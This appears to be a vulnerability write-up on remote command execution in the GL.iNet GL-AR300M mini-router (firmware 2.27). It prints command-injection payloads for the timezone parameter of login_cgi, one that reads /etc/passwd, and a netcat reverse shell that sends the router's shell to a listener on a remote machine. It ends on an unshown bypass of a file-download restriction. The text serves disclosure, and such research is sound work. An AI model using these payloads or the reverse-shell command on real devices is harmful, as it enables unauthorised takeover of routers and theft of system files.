Remote Command Execution on GL.iNet's mini-routers
Preparation
Product: GL-AR300M
Firmware version: 2.27
Command Injection
Hijack HTTP Request
The first time we start the device and login the web interface. Let's set the language and the timezone.
Using Fiddle tool to capture the HTTP request:
When we perform this action the login_cgi script takes the content of the timezone parameter and inserts it into the /tmp/TZ file:
Request Forgery
login_cgi
If we try to insert a value not present in the list of timezones, the script blocks us:
We can bypass this and write on TZ file what we want, using this payload:
|echo+TEST||a+#'+ ||a #
Replace the payload with:
|echo+TEST||a+#'+|echo `cat /etc/passwd` ||a #
So I can execute the command. On my remote machine, I am listening the port "12345" via nc -lvp 12345. Now, let's replace the payload with netcat.
nc 192.168.17.130:12345 -e /bin/ash
For now, I have got the router's shell on my remote machine.
download_file and storage_cgi
The device allows to share on the net the files present inside a storage usb devie and to download them. If we try to download /etc/passwd, the webserver responde with Access Denied, we can bypass it.